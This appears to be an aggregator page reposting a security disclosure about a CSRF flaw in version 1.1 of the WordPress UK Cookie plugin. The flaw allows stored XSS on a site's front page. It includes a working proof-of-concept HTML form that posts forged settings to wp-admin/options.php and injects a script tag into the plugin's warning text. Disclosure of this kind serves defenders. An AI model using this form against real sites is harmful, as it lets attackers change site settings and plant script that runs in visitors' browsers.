Headline

CVE-2013-2180: CVE-2012-5856 uk-cookie plugin XSS · Issue #184 · wpscanteam/wpscan

WordPress Plugin UK Cookie is prone to a cross-site request forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application; other attacks are also possible. WordPress Plugin UK Cookie version 1.1 is vulnerable; other versions may also be affected.

2 years ago

CVE

Open in Source

#xss #csrf #vulnerability #git #wordpress #php #auth

There is CSRF security vulnerability in uk-cookie plugin version 1.1 and using it attacker can insert XSS to front page of WordPress installation. Version 1.1 is the latest (checked 2013-06-06) and I did not test older versions.

<html>
<body>
<form action="https://example.com/wp-admin/options.php" method="POST">
<input type="hidden" name="option&#95;page" value="cookie&#95;plugin&#95;options" />
<input type="hidden" name="action" value="update" />
<input type="hidden" name="&#95;wpnonce" value="e909307b13" />
<input type="hidden" name="&#95;wp&#95;http&#95;referer" value="&#47;wp&#47;wp&#45;admin&#47;options&#45;general&#46;php&#63;page&#61;cookie&#45;alarm&#45;page&amp;settings&#45;updated&#61;true" />
<input type="hidden" name="cookiewarn&#95;options&#91;warn&#95;text&#93;" value="&lt;script&gt;alert&#40;&apos;hacked&apos;&#41;&lt;&#47;script&gt;" />
<input type="hidden" name="cookiewarn&#95;options&#91;redirect&#93;" value="https&#58;&#47;&#47;github&#46;com&#47;wpscanteam&#47;wpscan&#47;" />
<input type="hidden" name="cookiewarn&#95;options&#91;ok&#95;text&#93;" value="Yes" />
<input type="hidden" name="cookiewarn&#95;options&#91;notok&#95;text&#93;" value="No" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

9 months ago

9 months ago

9 months ago

9 months ago

9 months ago